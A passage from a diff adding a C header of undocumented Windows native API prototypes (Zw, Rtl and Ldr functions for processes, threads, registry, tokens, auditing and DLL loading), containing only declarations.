IN PROCESSINFOCLASS ProcessInformationClass, + OUT PVOID ProcessInformation, + IN ULONG ProcessInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwGetNextProcess ( + IN HANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + IN ULONG HandleAttributes, + IN ULONG Flags, + OUT PHANDLE NewProcessHandle + ); + + + +NTSTATUS +NTAPI +ZwGetNextThread ( + IN HANDLE ProcessHandle, + IN HANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN ULONG HandleAttributes, + IN ULONG Flags, + OUT PHANDLE NewThreadHandle + ); + + + +NTSTATUS +NTAPI +ZwQueryPortInformationProcess ( + VOID + ); + + + +NTSTATUS +NTAPI +ZwSetInformationProcess ( + IN HANDLE ProcessHandle, + IN PROCESSINFOCLASS ProcessInformationClass, + IN PVOID ProcessInformation, + IN ULONG ProcessInformationLength + ); + + + +NTSTATUS +NTAPI +ZwCreateThread ( + OUT PHANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN HANDLE ProcessHandle, + OUT PCLIENT_ID ClientId, + IN PCONTEXT ThreadContext, + IN PINITIAL_TEB InitialTeb, + IN BOOLEAN CreateSuspended + ); + + + +NTSTATUS +NTAPI +ZwOpenThread ( + OUT PHANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN OPTIONAL PCLIENT_ID ClientId + ); + + + +NTSTATUS +NTAPI +ZwTerminateThread ( + IN OPTIONAL HANDLE ThreadHandle, + IN NTSTATUS ExitStatus + ); + + + +NTSTATUS +NTAPI +ZwSuspendThread ( + IN HANDLE ThreadHandle, + OUT OPTIONAL PULONG PreviousSuspendCount + ); + + + +NTSTATUS +NTAPI +ZwResumeThread ( + IN HANDLE ThreadHandle, + OUT OPTIONAL PULONG PreviousSuspendCount + ); + + + +NTSTATUS +NTAPI +ZwSuspendProcess ( + IN HANDLE ProcessHandle + ); + + + +NTSTATUS +NTAPI +ZwResumeProcess ( + IN HANDLE ProcessHandle + ); + + + +NTSTATUS +NTAPI +ZwGetContextThread ( + IN HANDLE ThreadHandle, + IN OUT PCONTEXT ThreadContext + ); + + + +NTSTATUS +NTAPI +ZwSetContextThread ( + IN HANDLE ThreadHandle, + IN PCONTEXT ThreadContext + ); + + + +NTSTATUS +NTAPI +ZwQueryInformationThread ( + IN HANDLE ThreadHandle, + IN THREADINFOCLASS ThreadInformationClass, + OUT PVOID ThreadInformation, + IN ULONG ThreadInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwSetInformationThread ( + IN HANDLE ThreadHandle, + IN THREADINFOCLASS ThreadInformationClass, + IN PVOID ThreadInformation, + IN ULONG ThreadInformationLength + ); + + + +NTSTATUS +NTAPI +ZwAlertThread ( + IN HANDLE ThreadHandle + ); + + + +NTSTATUS +NTAPI +ZwAlertResumeThread ( + IN HANDLE ThreadHandle, + OUT OPTIONAL PULONG PreviousSuspendCount + ); + + + +NTSTATUS +NTAPI +ZwImpersonateThread ( + IN HANDLE ServerThreadHandle, + IN HANDLE ClientThreadHandle, + IN PSECURITY_QUALITY_OF_SERVICE SecurityQos + ); + + + +NTSTATUS +NTAPI +ZwTestAlert ( + VOID + ); + + + +NTSTATUS +NTAPI +ZwRegisterThreadTerminatePort ( + IN HANDLE PortHandle + ); + + + +NTSTATUS +NTAPI +ZwSetLdtEntries ( + IN ULONG Selector0, + IN ULONG Entry0Low, + IN ULONG Entry0Hi, + IN ULONG Selector1, + IN ULONG Entry1Low, + IN ULONG Entry1Hi + ); + + + +NTSTATUS +NTAPI +ZwQueueApcThread ( + IN HANDLE ThreadHandle, + IN PPS_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcArgument1, + IN OPTIONAL PVOID ApcArgument2, + IN OPTIONAL PVOID ApcArgument3 + ); + + + +NTSTATUS +NTAPI +ZwCreateJobObject ( + OUT PHANDLE JobHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwOpenJobObject ( + OUT PHANDLE JobHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwAssignProcessToJobObject ( + IN HANDLE JobHandle, + IN HANDLE ProcessHandle + ); + + + +NTSTATUS +NTAPI +ZwTerminateJobObject ( + IN HANDLE JobHandle, + IN NTSTATUS ExitStatus + ); + + + +NTSTATUS +NTAPI +ZwIsProcessInJob ( + IN HANDLE ProcessHandle, + IN OPTIONAL HANDLE JobHandle + ); + + + +NTSTATUS +NTAPI +ZwCreateJobSet ( + IN ULONG NumJob, + IN PJOB_SET_ARRAY UserJobSet, + IN ULONG Flags + ); + + + +NTSTATUS +NTAPI +ZwQueryInformationJobObject ( + IN OPTIONAL HANDLE JobHandle, + IN JOBOBJECTINFOCLASS JobObjectInformationClass, + OUT PVOID JobObjectInformation, + IN ULONG JobObjectInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwSetInformationJobObject ( + IN HANDLE JobHandle, + IN JOBOBJECTINFOCLASS JobObjectInformationClass, + IN PVOID JobObjectInformation, + IN ULONG JobObjectInformationLength + ); + + + +NTSTATUS +NTAPI +ZwCreateKey( + OUT PHANDLE KeyHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + ULONG TitleIndex, + IN OPTIONAL PUNICODE_STRING Class, + IN ULONG CreateOptions, + OUT OPTIONAL PULONG Disposition + ); + + + +NTSTATUS +NTAPI +ZwDeleteKey( + IN HANDLE KeyHandle + ); + + + +NTSTATUS +NTAPI +ZwDeleteValueKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName + ); + + + +NTSTATUS +NTAPI +ZwEnumerateKey( + IN HANDLE KeyHandle, + IN ULONG Index, + IN KEY_INFORMATION_CLASS KeyInformationClass, + OUT OPTIONAL PVOID KeyInformation, + IN ULONG Length, + OUT PULONG ResultLength + ); + + + +NTSTATUS +NTAPI +ZwEnumerateValueKey( + IN HANDLE KeyHandle, + IN ULONG Index, + IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, + OUT OPTIONAL PVOID KeyValueInformation, + IN ULONG Length, + OUT PULONG ResultLength + ); + + + +NTSTATUS +NTAPI +ZwFlushKey( + IN HANDLE KeyHandle + ); + + + +NTSTATUS +NTAPI +ZwInitializeRegistry( + IN USHORT BootCondition + ); + + + +NTSTATUS +NTAPI +ZwNotifyChangeKey( + IN HANDLE KeyHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG CompletionFilter, + IN BOOLEAN WatchTree, + OUT OPTIONAL PVOID Buffer, + IN ULONG BufferSize, + IN BOOLEAN Asynchronous + ); + + + +NTSTATUS +NTAPI +ZwNotifyChangeMultipleKeys( + IN HANDLE MasterKeyHandle, + IN OPTIONAL ULONG Count, + IN OPTIONAL OBJECT_ATTRIBUTES SlaveObjects[], + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG CompletionFilter, + IN BOOLEAN WatchTree, + OUT OPTIONAL PVOID Buffer, + IN ULONG BufferSize, + IN BOOLEAN Asynchronous + ); + + + +NTSTATUS +NTAPI +ZwLoadKey( + IN POBJECT_ATTRIBUTES TargetKey, + IN POBJECT_ATTRIBUTES SourceFile + ); + + + +NTSTATUS +NTAPI +ZwLoadKey2( + IN POBJECT_ATTRIBUTES TargetKey, + IN POBJECT_ATTRIBUTES SourceFile, + IN ULONG Flags + ); + + + +NTSTATUS +NTAPI +ZwLoadKeyEx( + IN POBJECT_ATTRIBUTES TargetKey, + IN POBJECT_ATTRIBUTES SourceFile, + IN ULONG Flags, + IN OPTIONAL HANDLE TrustClassKey + ); + + + +NTSTATUS +NTAPI +ZwOpenKey( + OUT PHANDLE KeyHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwQueryKey( + IN HANDLE KeyHandle, + IN KEY_INFORMATION_CLASS KeyInformationClass, + OUT OPTIONAL PVOID KeyInformation, + IN ULONG Length, + OUT PULONG ResultLength + ); + + + +NTSTATUS +NTAPI +ZwQueryValueKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName, + IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, + OUT OPTIONAL PVOID KeyValueInformation, + IN ULONG Length, + OUT PULONG ResultLength + ); + + + +NTSTATUS +NTAPI +ZwQueryMultipleValueKey( + IN HANDLE KeyHandle, + IN OUT PKEY_VALUE_ENTRY ValueEntries, + IN ULONG EntryCount, + OUT PVOID ValueBuffer, + IN OUT PULONG BufferLength, + OUT OPTIONAL PULONG RequiredBufferLength + ); + + + +NTSTATUS +NTAPI +ZwReplaceKey( + IN POBJECT_ATTRIBUTES NewFile, + IN HANDLE TargetHandle, + IN POBJECT_ATTRIBUTES OldFile + ); + + + +NTSTATUS +NTAPI +ZwRenameKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING NewName + ); + + + +NTSTATUS +NTAPI +ZwCompactKeys( + IN ULONG Count, + IN HANDLE KeyArray[] + ); + + + +NTSTATUS +NTAPI +ZwCompressKey( + IN HANDLE Key + ); + + + +NTSTATUS +NTAPI +ZwRestoreKey( + IN HANDLE KeyHandle, + IN HANDLE FileHandle, + IN ULONG Flags + ); + + + +NTSTATUS +NTAPI +ZwSaveKey( + IN HANDLE KeyHandle, + IN HANDLE FileHandle + ); + + + +NTSTATUS +NTAPI +ZwSaveKeyEx( + IN HANDLE KeyHandle, + IN HANDLE FileHandle, + IN ULONG Format + ); + + + +NTSTATUS +NTAPI +ZwSaveMergedKeys( + IN HANDLE HighPrecedenceKeyHandle, + IN HANDLE LowPrecedenceKeyHandle, + IN HANDLE FileHandle + ); + + + +NTSTATUS +NTAPI +ZwSetValueKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName, + IN OPTIONAL ULONG TitleIndex, + IN ULONG Type, + IN OPTIONAL PVOID Data, + IN ULONG DataSize + ); + + + +NTSTATUS +NTAPI +ZwUnloadKey( + IN POBJECT_ATTRIBUTES TargetKey + ); + + + +NTSTATUS +NTAPI +ZwUnloadKey2( + IN POBJECT_ATTRIBUTES TargetKey, + IN ULONG Flags + ); + + + +NTSTATUS +NTAPI +ZwUnloadKeyEx( + IN POBJECT_ATTRIBUTES TargetKey, + IN OPTIONAL HANDLE Event + ); + + + +NTSTATUS +NTAPI +ZwSetInformationKey( + IN HANDLE KeyHandle, + IN KEY_SET_INFORMATION_CLASS KeySetInformationClass, + IN PVOID KeySetInformation, + IN ULONG KeySetInformationLength + ); + + + +NTSTATUS +NTAPI +ZwQueryOpenSubKeys( + IN POBJECT_ATTRIBUTES TargetKey, + OUT PULONG HandleCount + ); + + + +NTSTATUS +NTAPI +ZwQueryOpenSubKeysEx( + IN POBJECT_ATTRIBUTES TargetKey, + IN ULONG BufferLength, + OUT PVOID Buffer, + OUT PULONG RequiredSize + ); + + + +NTSTATUS +NTAPI +ZwLockRegistryKey( + IN HANDLE KeyHandle + ); + + + +NTSTATUS +NTAPI +ZwLockProductActivationKeys( + IN OUT OPTIONAL ULONG *pPrivateVer, + OUT OPTIONAL ULONG *pSafeMode + ); + + + +NTSTATUS +NTAPI +ZwAccessCheck ( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN HANDLE ClientToken, + IN ACCESS_MASK DesiredAccess, + IN PGENERIC_MAPPING GenericMapping, + OUT PPRIVILEGE_SET PrivilegeSet, + IN OUT PULONG PrivilegeSetLength, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus + ); + + + +NTSTATUS +NTAPI +ZwAccessCheckByType ( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN OPTIONAL PSID PrincipalSelfSid, + IN HANDLE ClientToken, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_TYPE_LIST ObjectTypeList, + IN ULONG ObjectTypeListLength, + IN PGENERIC_MAPPING GenericMapping, + OUT PPRIVILEGE_SET PrivilegeSet, + IN OUT PULONG PrivilegeSetLength, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus + ); + + + +NTSTATUS +NTAPI +ZwAccessCheckByTypeResultList ( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN OPTIONAL PSID PrincipalSelfSid, + IN HANDLE ClientToken, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_TYPE_LIST ObjectTypeList, + IN ULONG ObjectTypeListLength, + IN PGENERIC_MAPPING GenericMapping, + OUT PPRIVILEGE_SET PrivilegeSet, + IN OUT PULONG PrivilegeSetLength, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus + ); + + + +NTSTATUS +NTAPI +ZwCreateToken( + OUT PHANDLE TokenHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN TOKEN_TYPE TokenType, + IN PLUID AuthenticationId, + IN PLARGE_INTEGER ExpirationTime, + IN PTOKEN_USER User, + IN PTOKEN_GROUPS Groups, + IN PTOKEN_PRIVILEGES Privileges, + IN OPTIONAL PTOKEN_OWNER Owner, + IN PTOKEN_PRIMARY_GROUP PrimaryGroup, + IN OPTIONAL PTOKEN_DEFAULT_DACL DefaultDacl, + IN PTOKEN_SOURCE TokenSource + ); + + + +NTSTATUS +NTAPI +ZwCompareTokens( + IN HANDLE FirstTokenHandle, + IN HANDLE SecondTokenHandle, + OUT PBOOLEAN Equal + ); + + + +NTSTATUS +NTAPI +ZwOpenThreadToken( + IN HANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN BOOLEAN OpenAsSelf, + OUT PHANDLE TokenHandle + ); + + + +NTSTATUS +NTAPI +ZwOpenThreadTokenEx( + IN HANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN BOOLEAN OpenAsSelf, + IN ULONG HandleAttributes, + OUT PHANDLE TokenHandle + ); + + + +NTSTATUS +NTAPI +ZwOpenProcessToken( + IN HANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + OUT PHANDLE TokenHandle + ); + + + +NTSTATUS +NTAPI +ZwOpenProcessTokenEx( + IN HANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + IN ULONG HandleAttributes, + OUT PHANDLE TokenHandle + ); + + + +NTSTATUS +NTAPI +ZwDuplicateToken( + IN HANDLE ExistingTokenHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN BOOLEAN EffectiveOnly, + IN TOKEN_TYPE TokenType, + OUT PHANDLE NewTokenHandle + ); + + + +NTSTATUS +NTAPI +ZwFilterToken ( + IN HANDLE ExistingTokenHandle, + IN ULONG Flags, + IN OPTIONAL PTOKEN_GROUPS SidsToDisable, + IN OPTIONAL PTOKEN_PRIVILEGES PrivilegesToDelete, + IN OPTIONAL PTOKEN_GROUPS RestrictedSids, + OUT PHANDLE NewTokenHandle + ); + + + +NTSTATUS +NTAPI +ZwImpersonateAnonymousToken( + IN HANDLE ThreadHandle + ); + + + +NTSTATUS +NTAPI +ZwQueryInformationToken ( + IN HANDLE TokenHandle, + IN TOKEN_INFORMATION_CLASS TokenInformationClass, + OUT PVOID TokenInformation, + IN ULONG TokenInformationLength, + OUT PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwSetInformationToken ( + IN HANDLE TokenHandle, + IN TOKEN_INFORMATION_CLASS TokenInformationClass, + IN PVOID TokenInformation, + IN ULONG TokenInformationLength + ); + + + +NTSTATUS +NTAPI +ZwAdjustPrivilegesToken ( + IN HANDLE TokenHandle, + IN BOOLEAN DisableAllPrivileges, + IN OPTIONAL PTOKEN_PRIVILEGES NewState, + IN OPTIONAL ULONG BufferLength, + OUT PTOKEN_PRIVILEGES PreviousState, + OUT OPTIONAL PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwAdjustGroupsToken ( + IN HANDLE TokenHandle, + IN BOOLEAN ResetToDefault, + IN PTOKEN_GROUPS NewState , + IN OPTIONAL ULONG BufferLength , + OUT PTOKEN_GROUPS PreviousState , + OUT PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwPrivilegeCheck ( + IN HANDLE ClientToken, + IN OUT PPRIVILEGE_SET RequiredPrivileges, + OUT PBOOLEAN Result + ); + + + +NTSTATUS +NTAPI +ZwAccessCheckAndAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN PUNICODE_STRING ObjectTypeName, + IN PUNICODE_STRING ObjectName, + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN ACCESS_MASK DesiredAccess, + IN PGENERIC_MAPPING GenericMapping, + IN BOOLEAN ObjectCreation, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus, + OUT PBOOLEAN GenerateOnClose + ); + + + +NTSTATUS +NTAPI +ZwAccessCheckByTypeAndAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN PUNICODE_STRING ObjectTypeName, + IN PUNICODE_STRING ObjectName, + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN OPTIONAL PSID PrincipalSelfSid, + IN ACCESS_MASK DesiredAccess, + IN AUDIT_EVENT_TYPE AuditType, + IN ULONG Flags, + IN POBJECT_TYPE_LIST ObjectTypeList, + IN ULONG ObjectTypeListLength, + IN PGENERIC_MAPPING GenericMapping, + IN BOOLEAN ObjectCreation, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus, + OUT PBOOLEAN GenerateOnClose + ); + + + +NTSTATUS +NTAPI +ZwAccessCheckByTypeResultListAndAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN PUNICODE_STRING ObjectTypeName, + IN PUNICODE_STRING ObjectName, + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN OPTIONAL PSID PrincipalSelfSid, + IN ACCESS_MASK DesiredAccess, + IN AUDIT_EVENT_TYPE AuditType, + IN ULONG Flags, + IN POBJECT_TYPE_LIST ObjectTypeList, + IN ULONG ObjectTypeListLength, + IN PGENERIC_MAPPING GenericMapping, + IN BOOLEAN ObjectCreation, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus, + OUT PBOOLEAN GenerateOnClose + ); + + + +NTSTATUS +NTAPI +ZwAccessCheckByTypeResultListAndAuditAlarmByHandle ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN HANDLE ClientToken, + IN PUNICODE_STRING ObjectTypeName, + IN PUNICODE_STRING ObjectName, + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN OPTIONAL PSID PrincipalSelfSid, + IN ACCESS_MASK DesiredAccess, + IN AUDIT_EVENT_TYPE AuditType, + IN ULONG Flags, + IN POBJECT_TYPE_LIST ObjectTypeList, + IN ULONG ObjectTypeListLength, + IN PGENERIC_MAPPING GenericMapping, + IN BOOLEAN ObjectCreation, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus, + OUT PBOOLEAN GenerateOnClose + ); + + +NTSTATUS +NTAPI +ZwOpenObjectAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN PUNICODE_STRING ObjectTypeName, + IN PUNICODE_STRING ObjectName, + IN OPTIONAL PSECURITY_DESCRIPTOR SecurityDescriptor, + IN HANDLE ClientToken, + IN ACCESS_MASK DesiredAccess, + IN ACCESS_MASK GrantedAccess, + IN OPTIONAL PPRIVILEGE_SET Privileges, + IN BOOLEAN ObjectCreation, + IN BOOLEAN AccessGranted, + OUT PBOOLEAN GenerateOnClose + ); + + +NTSTATUS +NTAPI +ZwPrivilegeObjectAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN HANDLE ClientToken, + IN ACCESS_MASK DesiredAccess, + IN PPRIVILEGE_SET Privileges, + IN BOOLEAN AccessGranted + ); + + +NTSTATUS +NTAPI +ZwCloseObjectAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN BOOLEAN GenerateOnClose + ); + + +NTSTATUS +NTAPI +ZwDeleteObjectAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN BOOLEAN GenerateOnClose + ); + + +NTSTATUS +NTAPI +ZwPrivilegedServiceAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN PUNICODE_STRING ServiceName, + IN HANDLE ClientToken, + IN PPRIVILEGE_SET Privileges, + IN BOOLEAN AccessGranted + ); + + +NTSTATUS +NTAPI +ZwContinue ( + IN PCONTEXT ContextRecord, + IN BOOLEAN TestAlert + ); + + +NTSTATUS +NTAPI +ZwRaiseException ( + IN PEXCEPTION_RECORD ExceptionRecord, + IN PCONTEXT ContextRecord, + IN BOOLEAN FirstChance + ); + +// end_zwapi + +ULONG +DbgPrint( + IN PCH Format, + ... + ); + +VOID NTAPI +DebugService2 ( + PVOID Arg1, + PVOID Arg2, + ULONG Service + ); + + +__inline +LARGE_INTEGER +NTAPI +RtlLargeIntegerAdd ( + LARGE_INTEGER Addend1, + LARGE_INTEGER Addend2 + ); + +__inline +LARGE_INTEGER +NTAPI +RtlEnlargedIntegerMultiply ( + LONG Multiplicand, + LONG Multiplier + ); + +__inline +LARGE_INTEGER +NTAPI +RtlEnlargedUnsignedMultiply ( + ULONG Multiplicand, + ULONG Multiplier + ); + +__inline +ULONG +NTAPI +RtlEnlargedUnsignedDivide ( + IN ULARGE_INTEGER Dividend, + IN ULONG Divisor, + IN PULONG Remainder OPTIONAL + ); + +__inline +LARGE_INTEGER +NTAPI +RtlLargeIntegerNegate ( + LARGE_INTEGER Subtrahend + ); + +__inline +LARGE_INTEGER +NTAPI +RtlLargeIntegerSubtract ( + LARGE_INTEGER Minuend, + LARGE_INTEGER Subtrahend + ); + +LARGE_INTEGER +NTAPI +RtlExtendedMagicDivide ( + LARGE_INTEGER Dividend, + LARGE_INTEGER MagicDivisor, + CCHAR ShiftCount + ); + +LARGE_INTEGER +NTAPI +RtlExtendedLargeIntegerDivide ( + LARGE_INTEGER Dividend, + ULONG Divisor, + PULONG Remainder + ); + +LARGE_INTEGER +NTAPI +RtlLargeIntegerDivide ( + LARGE_INTEGER Dividend, + LARGE_INTEGER Divisor, + PLARGE_INTEGER Remainder + ); + +LARGE_INTEGER +NTAPI +RtlExtendedIntegerMultiply ( + LARGE_INTEGER Multiplicand, + LONG Multiplier + ); + +__inline +LARGE_INTEGER +NTAPI +RtlConvertLongToLargeInteger ( + LONG SignedInteger + ); + + +__inline +LARGE_INTEGER +NTAPI +RtlConvertUlongToLargeInteger ( + ULONG UnsignedInteger + ); + +__inline +LARGE_INTEGER +NTAPI +RtlLargeIntegerShiftLeft ( + LARGE_INTEGER LargeInteger, + CCHAR ShiftCount + ); + +__inline +LARGE_INTEGER +NTAPI +RtlLargeIntegerShiftRight ( + LARGE_INTEGER LargeInteger, + CCHAR ShiftCount + ); + + +__inline +LARGE_INTEGER +NTAPI +RtlLargeIntegerArithmeticShift ( + LARGE_INTEGER LargeInteger, + CCHAR ShiftCount + ); + + +__inline +BOOLEAN +NTAPI +RtlCheckBit ( + PRTL_BITMAP BitMapHeader, + ULONG BitPosition + ); + + +BOOLEAN +NTAPI +RtlIsValidOemCharacter ( + IN OUT PWCHAR Char + ); + +PIMAGE_NT_HEADERS +NTAPI +RtlpImageNtHeader( + PVOID Base + ); + +RTL_PATH_TYPE +RtlDetermineDosPathNameType_U( + IN PCWSTR DosFileName + ); + +PRTL_TRACE_DATABASE +RtlTraceDatabaseCreate ( + IN ULONG Buckets, + IN SIZE_T MaximumSize OPTIONAL, + IN ULONG Flags, // OPTIONAL in User mode + IN ULONG Tag, // OPTIONAL in User mode + IN RTL_TRACE_HASH_FUNCTION HashFunction OPTIONAL + ); + +BOOLEAN +RtlTraceDatabaseValidate ( + IN PRTL_TRACE_DATABASE Database + ); + +BOOLEAN +RtlTraceDatabaseAdd ( + IN PRTL_TRACE_DATABASE Database, + IN ULONG Count, + IN PVOID * Trace, + OUT PRTL_TRACE_BLOCK * TraceBlock OPTIONAL + ); + +BOOLEAN +RtlTraceDatabaseFind ( + PRTL_TRACE_DATABASE Database, + IN ULONG Count, + IN PVOID * Trace, + OUT PRTL_TRACE_BLOCK * TraceBlock OPTIONAL + ); + +BOOLEAN +RtlTraceDatabaseEnumerate ( + PRTL_TRACE_DATABASE Database, + OUT PRTL_TRACE_ENUMERATE Enumerate, + OUT PRTL_TRACE_BLOCK * TraceBlock + ); + +VOID +RtlTraceDatabaseLock ( + IN PRTL_TRACE_DATABASE Database + ); + +VOID +RtlTraceDatabaseUnlock ( + IN PRTL_TRACE_DATABASE Database + ); + +VOID +RtlpGetStackLimits ( + OUT PULONG_PTR LowLimit, + OUT PULONG_PTR HighLimit + ); + +NTSTATUS +NTAPI +RtlEnterCriticalSection( + PRTL_CRITICAL_SECTION CriticalSection + ); + +NTSTATUS +NTAPI +RtlLeaveCriticalSection( + PRTL_CRITICAL_SECTION CriticalSection + ); + +LOGICAL +NTAPI +RtlIsCriticalSectionLocked ( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + +LOGICAL +NTAPI +RtlIsCriticalSectionLockedByThread ( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + +ULONG +NTAPI +RtlGetCriticalSectionRecursionCount ( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + +LOGICAL +NTAPI +RtlTryEnterCriticalSection( + PRTL_CRITICAL_SECTION CriticalSection + ); + +NTSTATUS +NTAPI +RtlInitializeCriticalSection( + PRTL_CRITICAL_SECTION CriticalSection + ); + +VOID +NTAPI +RtlEnableEarlyCriticalSectionEventCreation( + VOID + ); + +NTSTATUS +NTAPI +RtlInitializeCriticalSectionAndSpinCount( + PRTL_CRITICAL_SECTION CriticalSection, + ULONG SpinCount + ); + +ULONG +NTAPI +RtlSetCriticalSectionSpinCount( + PRTL_CRITICAL_SECTION CriticalSection, + ULONG SpinCount + ); + +NTSTATUS +NTAPI +RtlDeleteCriticalSection( + PRTL_CRITICAL_SECTION CriticalSection + ); + +NTSTATUS +NTAPI +LdrDisableThreadCalloutsForDll ( + IN PVOID DllHandle + ); + +NTSTATUS +NTAPI +LdrLoadDll( + IN OPTIONAL PWSTR DllPath, + IN OPTIONAL PULONG DllCharacteristics, + IN PUNICODE_STRING DllName, + OUT PVOID *DllHandle + ); + +NTSTATUS +NTAPI +LdrUnloadDll( + IN PVOID DllHandle + ); + +NTSTATUS +NTAPI +LdrGetDllHandle( + IN OPTIONAL PWSTR DllPath, + IN OPTIONAL PULONG DllCharacteristics, + IN PUNICODE_STRING DllName, + OUT PVOID *DllHandle + ); + +NTSTATUS +NTAPI +LdrGetDllHandleEx( + IN ULONG Flags, + IN OPTIONAL PCWSTR DllPath, + IN OPTIONAL PULONG DllCharacteristics, + IN PUNICODE_STRING DllName, + OUT OPTIONAL PVOID *DllHandle + ); + +NTSTATUS +NTAPI +LdrGetDllHandleByMapping( + IN PVOID Base, + OUT PVOID *DllHandle + ); + +NTSTATUS +NTAPI +LdrGetDllHandleByName( + IN OPTIONAL PUNICODE_STRING BaseDllName, + IN OPTIONAL PUNICODE_STRING FullDllName, + OUT PVOID *DllHandle + ); + +NTSTATUS +NTAPI +LdrAddRefDll( + IN ULONG Flags, + IN PVOID DllHandle + ); + +NTSTATUS +NTAPI +LdrGetProcedureAddress( + IN PVOID DllHandle, + IN OPTIONAL PANSI_STRING ProcedureName, + IN OPTIONAL ULONG ProcedureNumber, + OUT PVOID *ProcedureAddress + ); + +NTSTATUS +NTAPI +LdrGetProcedureAddressEx( + IN PVOID DllHandle, + IN OPTIONAL PANSI_STRING ProcedureName, + IN OPTIONAL ULONG ProcedureNumber, + OUT PVOID *ProcedureAddress, + IN ULONG Flags + ); + +NTSTATUS +NTAPI +LdrLockLoaderLock( + IN ULONG Flags, + OUT OPTIONAL ULONG *Disposition, + OUT PVOID *Cookie + ); + +NTSTATUS +NTAPI +LdrRelocateImage( + IN PVOID NewBase, + IN PSTR LoaderName, + IN NTSTATUS Success, + IN NTSTATUS Conflict, + IN NTSTATUS Invalid + ); + +NTSTATUS +NTAPI +LdrRelocateImageWithBias( + IN PVOID NewBase, + IN LONGLONG Bias, + IN PSTR LoaderName, + IN NTSTATUS Success, + IN NTSTATUS Conflict, + IN NTSTATUS Invalid + ); + +PIMAGE_BASE_RELOCATION +NTAPI +LdrProcessRelocationBlock( + IN ULONG_PTR VA, + IN ULONG SizeOfBlock, + IN PUSHORT NextOffset, + IN LONG_PTR Diff + ); + +BOOLEAN +NTAPI +LdrVerifyMappedImageMatchesChecksum( + IN PVOID BaseAddress, + IN SIZE_T NumberOfBytes, + IN ULONG FileLength + ); + +NTSTATUS +NTAPI +LdrQueryModuleServiceTags( + IN PVOID DllHandle, + OUT PULONG ServiceTagBuffer, + IN OUT PULONG BufferSize + ); + +NTSTATUS +NTAPI +LdrRegisterDllNotification( + IN ULONG Flags, + IN PLDR_DLL_NOTIFICATION_FUNCTION 